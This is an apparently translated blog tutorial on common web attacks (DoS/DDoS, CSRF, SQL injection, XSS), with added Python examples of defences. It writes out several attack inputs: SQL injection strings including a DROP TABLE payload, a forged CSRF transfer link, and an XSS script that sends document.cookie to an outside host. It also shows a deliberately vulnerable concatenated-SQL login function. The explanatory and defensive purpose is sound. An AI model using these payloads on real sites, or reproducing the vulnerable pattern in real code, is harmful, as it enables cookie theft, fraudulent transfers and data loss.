Several web attacks

Copyright: https://blog.csdn.net/zhydream77/article/details/85694614

One, DoS attack (Denial of Service attack)

  A DoS attack is an attack method aimed at a server that leaves the server unable to provide service; it is sometimes called a service-stop attack or a denial-of-service attack. The principle is to send a large number of legitimate-looking requests to the server. The server cannot tell whether these requests are normal requests or attack requests, so it accepts all of them. The flood of requests causes the server to stop working or to enter a state where it denies service. This is a DoS attack.

Two, DDoS attack

Concept

  • Distributed Denial of Service (DDoS): put simply, a large number of requests is sent to bring the server to its knees. DDoS can be understood on the basis of DoS: DoS is a one-on-one fight, while DDoS is a gang fight. As technology developed, the lethality of a single-source DoS attack decreased, so DDoS appeared: the attacker uses public networks to gather a large number of computers and attacks one or more targets with all of them together.

Case

  • SYN Flood. Briefly, the TCP three-way handshake works like this: the client sends the server a request to establish a connection, the server returns a message indicating that the request is accepted, the client returns a final message, and the connection is established. Now consider the following situation: the attacker forges the source IP address and sends a connection request to the server. When the server receives it, by the rules of the three-way handshake it must respond with a message, but because the IP is fake nobody answers that message; the second handshake fails, and the third naturally cannot take place. Since the server never receives the client's third-handshake packet, it repeats the second handshake again and again. If the attacker forges a large number of IP addresses and sends requests from all of them, the server has to maintain a very large queue of half-open connections, which occupies a lot of resources until the server is finally brought to its knees.
  • CC attack: an attack at the application layer that uses the HTTP protocol to simulate normal users sending a large number of requests, until the site can no longer provide service.
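To make the half-open queue concrete, here is an added example that is not part of the original post: a toy in-memory model of a server's half-open connection table with a fixed capacity and an entry timeout, next to a stateless SYN-cookie check (the defence most kernels use) that lets the server answer a SYN without storing anything. The capacity, timeout, addresses and server secret are constructed values; nothing touches the network.

```python
"""Added example (not from the original post): a toy model of a server's
half-open connection table under spoofed SYNs, and a stateless SYN-cookie
check. All hosts, ports, sizes and the secret below are constructed."""
import hashlib
import hmac
import secrets
import time

BACKLOG_SIZE = 128          # assumed capacity of the half-open table
SYN_TIMEOUT = 60.0          # seconds a half-open entry is retained


class HalfOpenTable:
    """Stateful server: every accepted SYN occupies a slot until the matching
    third-handshake packet arrives or the entry times out."""

    def __init__(self, capacity=BACKLOG_SIZE, timeout=SYN_TIMEOUT):
        self.capacity = capacity
        self.timeout = timeout
        self.entries = {}   # (src_ip, src_port) -> time the SYN was queued

    def expire(self, now):
        self.entries = {k: t for k, t in self.entries.items() if now - t < self.timeout}

    def on_syn(self, src_ip, src_port, now):
        """Return True if the server can queue this SYN and reply to it."""
        self.expire(now)
        if len(self.entries) >= self.capacity:
            return False            # backlog full: legitimate clients are dropped too
        self.entries[(src_ip, src_port)] = now
        return True

    def on_ack(self, src_ip, src_port, now):
        """Third handshake packet: release the slot, connection established."""
        self.expire(now)
        return self.entries.pop((src_ip, src_port), None) is not None


SERVER_SECRET = secrets.token_bytes(32)   # constructed; rotated in practice


def syn_cookie(src_ip, src_port, secret=SERVER_SECRET, minute=None):
    """Stateless alternative: derive the initial sequence number from the
    client address, a time slot and a server secret instead of storing state."""
    minute = int(time.time() // 60) if minute is None else minute
    msg = f"{src_ip}:{src_port}:{minute}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")


def verify_syn_cookie(src_ip, src_port, ack_number, secret=SERVER_SECRET, minute=None):
    """The client's third packet acknowledges cookie+1; recompute and compare in
    constant time. Spoofed SYNs never produce this packet, so they cost no memory."""
    minute = int(time.time() // 60) if minute is None else minute
    expected = (syn_cookie(src_ip, src_port, secret, minute) + 1) & 0xFFFFFFFF
    return hmac.compare_digest(expected.to_bytes(4, "big"),
                               (ack_number & 0xFFFFFFFF).to_bytes(4, "big"))


def simulate_backlog_exhaustion(spoofed=500, capacity=BACKLOG_SIZE):
    """Queue `spoofed` SYNs from forged addresses that never complete the
    handshake, then one legitimate client. Returns (spoofed_accepted, legit_accepted)."""
    table = HalfOpenTable(capacity=capacity)
    accepted = sum(table.on_syn(f"10.0.{i // 256}.{i % 256}", 40000 + i, now=0.0)
                   for i in range(spoofed))
    legit = table.on_syn("192.0.2.10", 51000, now=1.0)   # still inside the timeout window
    return accepted, legit
```

With the stateful table, the forged SYNs fill all 128 slots and the legitimate client is turned away until the entries time out; with the cookie, the server keeps no entry per SYN and only a client that really receives the server's reply can produce the matching acknowledgement.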

Why the attack works

  • The server's bandwidth is insufficient and cannot absorb the attacker's traffic.

Prevention

  • The most direct method is to increase bandwidth. But the attacker attacks with whatever computers are around him and does not need to spend much money on bandwidth, whereas for a server bandwidth is very expensive.
  • Cloud service providers have their own complete DDoS solutions and can provide abundant bandwidth resources. If needed, Alibaba Cloud's high-defence (Anti-DDoS) service is recommended.

 

Three, CSRF (Cross-Site Request Forgery)

Concept

  • CSRF (cross-site request forgery) means gaining access by masquerading as a trusted user. Put simply: I visit site A and the browser keeps A's cookie; I then visit a rogue website and accidentally click a link on it (which sends a request), and at that moment the rogue site uses my identity to make a request to site A. In other words, the attacker has set a trap in advance that forces a user who has already completed authentication to submit unintended personal information or update some state. It is a passive attack. Simply put, the attacker steals your name and sends requests in your name.

Case

  • The simplest CSRF example: user A logs into site A and transfers 1,000 dollars from his virtual account, and site A generates a cookie in user A's browser. Without closing site A, user A visits malicious website B, which contains request code aimed at site A; that code uses the locally stored cookie as the authenticated identity to send a request to site A, and user A then finds that his account on site A is 1,000 short. This is the basic form of a CSRF attack.

  • This example may not exist in reality, but the attack pattern is the same. For example, I log into bank A's website and then visit my roommate's rogue website, which contains a link such as www.A.com/transfer?account=666&money=10000; at that point I may well have transferred 10,000 RMB to the person with account 666.
  • Note that for this attack I do not necessarily have to click the link; the transfer link can also be loaded as one of the page's resource requests, for example <img src="http://www.A.com/transfer?account=666&money=10000">.

Why the attack works

  • The user's cookie is stored locally; the attacker relies on the cookie to authenticate as the user and then forges a request on the user's behalf.

Prevention

  • The attack works because the attacker relies on the cookie stored in the browser for user authentication, so if we do not authenticate with the cookie alone, the attack can be prevented. We can therefore use a token (not stored in the browser) for authentication.
  • Check the Referer. HTTP Referer is part of the request header; when the browser sends a request to the web server it usually carries the Referer, telling the server which page the link came from, and the server can use this information for processing. In this case, we require that the transfer request come from a page of bank A's website where the user is logged in.
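The two defences above, as an added example that is not part of the original post: a hypothetical transfer handler for the bank site www.A.com from the example, which accepts a request only when the Origin or Referer header names our own host and the form carries a per-session token that a rogue site cannot read. The request dictionaries, session ids and the form-based transfer (the post's link uses a GET query string; the token needs a hidden form field, so a form submission is assumed here) are all constructed.

```python
"""Added example (not from the original post): CSRF token and Referer/Origin
check for a hypothetical transfer endpoint. Host name taken from the post's
example; session ids, secret and request shapes are constructed."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "www.A.com"               # the bank site from the post's example
TOKEN_KEY = secrets.token_bytes(32)   # server-side secret, constructed here


def issue_csrf_token(session_id):
    """Derive the token from the session id with an HMAC, so it is only valid
    for the session that rendered the form. It is placed in a hidden form
    field, never in a cookie, so a request forged from another site cannot
    carry it: the browser attaches cookies automatically, not form fields."""
    return hmac.new(TOKEN_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id, submitted_token):
    if not submitted_token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted_token)


def referer_is_same_site(headers):
    """Second defence: the request must originate from a page of our own site.
    Origin is preferred, Referer is the fallback. A request carrying neither is
    rejected rather than allowed, so a stripped header never fails open."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    # urlsplit().hostname is lower-cased, so compare case-insensitively
    return (urlsplit(origin).hostname or "") == SITE_HOST.lower()


def handle_transfer(request):
    """request: dict with 'cookies', 'headers' and 'form'. The session cookie
    alone (all that the forged <img> or link request carries) is not enough."""
    session_id = request["cookies"].get("session")
    if not session_id:
        return 401, "not logged in"
    if not referer_is_same_site(request["headers"]):
        return 403, "cross-site request rejected"
    if not token_is_valid(session_id, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    account = request["form"]["account"]
    money = request["form"]["money"]
    return 200, f"transferred {money} to {account}"
```

A request triggered from the roommate's rogue page carries the victim's session cookie but a foreign Referer and no token, so it is refused at the first or second check; the user's own transfer form passes both.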

 

Four, SQL injection attack

Concept

This refers to an attack in which malicious SQL statements are sent to the database through a web connection, creating security risks and threats to the site, such as bypassing verification or leaking private information. The principle of SQL injection is that the SQL statement is assembled carelessly, so malicious SQL can be injected into it.

Case

  • ' or '1'='1. This is the most common SQL injection. Suppose we enter jiajun as the user name and enter ' or '1'='1 as the password. When the program checks whether the user name and password are correct, what it intends to run is select * from user where username='' and password=''; after the parameters are concatenated in, the statement actually executed is select * from user where username='jiajun' and password='' or '1'='1'. Now 1=1 is true, so verification is naturally skipped.
  • A more serious case: if the password entered is ';drop table user;--, the SQL executed becomes select * from user where username='jiajun' and password='';drop table user;--' and the whole table is simply deleted.

Why the attack works

  • Parameters of the SQL statement are forged, and after the parameters are spliced into the statement a destructive SQL statement is formed, leading to an attack on the database.

Prevention

  • In Java we can use prepared statements (PreparedStatement); then even if forged parameters are sent to the server in the SQL statement, the forged parameters are merely characters and cannot take effect as an attack.
  • Many ORM frameworks already escape parameters.
  • Prepare for the worst, that is, for the database being 'dragged' ('tuoku', a database leak). Passwords should not be stored in the database in plain text; the password can be hashed with MD5, and to increase the cost of cracking a salt can be used: the database stores the user name, the salt (a long random string), and the MD5 ciphertext.
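The login query from the case above, built both ways, together with salted password storage, as an added example that is not part of the original post. It uses Python's standard sqlite3 module and an in-memory database with the constructed user jiajun; the `user` table mirrors the post's plaintext query, and `user_secure` stores only a salt and a hash. PBKDF2-HMAC-SHA256 is used in place of the MD5 the post mentions, since it is what a current password store would use.

```python
"""Added example (not from the original post): the post's login query with
string concatenation versus a parameterized statement, plus salted password
hashing. Database, user and password are constructed; PBKDF2-HMAC-SHA256
stands in for MD5."""
import hashlib
import secrets
import sqlite3

PBKDF2_ROUNDS = 100_000   # work factor; raise as hardware improves


def hash_password(password, salt=None):
    """Return (salt_hex, hash_hex). The salt is random per user and stored
    beside the hash, so identical passwords do not share a ciphertext."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex(), digest.hex()


def verify_password(password, salt_hex, hash_hex):
    _, recomputed = hash_password(password, bytes.fromhex(salt_hex))
    return secrets.compare_digest(recomputed, hash_hex)


def make_db():
    """Constructed in-memory database: `user` mirrors the post's plaintext
    table, `user_secure` holds only salt and hash for the same user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("CREATE TABLE user_secure (username TEXT PRIMARY KEY, salt TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO user VALUES (?, ?)", ("jiajun", "secret123"))
    salt, pwhash = hash_password("secret123")
    conn.execute("INSERT INTO user_secure VALUES (?, ?, ?)", ("jiajun", salt, pwhash))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation, as in the post: the input becomes part of the SQL.
    With the password  ' or '1'='1  the WHERE clause is always true."""
    sql = f"select * from user where username='{username}' and password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Prepared statement (the PreparedStatement remedy from the post): the
    values travel separately from the SQL text, so quotes in them are just
    characters and the statement's structure cannot change."""
    row = conn.execute(
        "select * from user where username=? and password=?", (username, password)
    ).fetchone()
    return row is not None


def login_hashed(conn, username, password):
    """Parameterized lookup by user name only; the password never enters SQL,
    and a leaked table yields salts and hashes rather than passwords."""
    row = conn.execute(
        "select salt, pwhash from user_secure where username=?", (username,)
    ).fetchone()
    if row is None:
        return False
    return verify_password(password, row[0], row[1])
```

The stacked-statement variant (';drop table user;--) is not reproduced here: sqlite3's execute() refuses to run more than one statement per call, so that payload raises an error in this module rather than dropping the table, which does not hold for drivers or scripts that execute batches.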

Five, XSS attack (Cross-Site Scripting)

Concept

Cross-site scripting refers to running illegal HTML tags or JavaScript in the browser of a registered user of the site, so as to achieve the attacker's goal, such as stealing the user's cookie, changing the DOM structure of the page, or redirecting to other pages.

Case

  • For example, I write a blog site and an attacker posts an article on it whose content is <script>window.open("www.gongji.com?param="+document.cookie)</script>. If I do not process what he submitted and store it directly in the database, then the next time another user opens his article, the server reads it from the database and returns it to the client, the browser executes the script, and that user's cookie is sent to the attacker's server.

Why the attack works

  • User-entered data is turned into code, as with the <script> in the example above; it should have been treated only as a string.

Prevention

  • Escape the input data; for example, < is escaped as &lt;.
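The blog-article scenario from the case above, rendered unescaped and escaped, as an added example that is not part of the original post. The page template and the article text (a payload of the same shape as the post's) are constructed; escaping is done with Python's html.escape at the point where the stored text is placed into the page, so < becomes &lt; and the browser shows the tag as text instead of running it.

```python
"""Added example (not from the original post): rendering stored user content
with and without output escaping. Template and article text are constructed."""
import html

ARTICLE_TEMPLATE = '<article><h1>{title}</h1><div>{body}</div></article>'
LINK_TEMPLATE = '<a href="{url}">{text}</a>'

# Constructed payload with the same shape as the one in the post.
MALICIOUS_BODY = '<script>window.open("www.gongji.com?param="+document.cookie)</script>'


def render_unsafe(title, body):
    """Stored content is inserted verbatim: the browser will execute the script."""
    return ARTICLE_TEMPLATE.format(title=title, body=body)


def render_escaped(title, body):
    """Every user-controlled value is escaped as it is placed into the page;
    < > & " ' become entities, so the text cannot open a tag."""
    return ARTICLE_TEMPLATE.format(title=html.escape(title, quote=True),
                                   body=html.escape(body, quote=True))


def render_link_escaped(url, text):
    """Attribute context: escaping the quote character (quote=True) matters here,
    otherwise a value containing a double quote could close the href attribute
    and add attributes of its own."""
    return LINK_TEMPLATE.format(url=html.escape(url, quote=True),
                                text=html.escape(text, quote=True))


def contains_active_script(page):
    """Crude check for this demonstration only: a raw <script tag in the output."""
    return "<script" in page.lower()
```

The escaped version still displays the attacker's text faithfully (the entities decode back to the original characters when shown), which is the point: the data survives, only its ability to act as code is removed.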

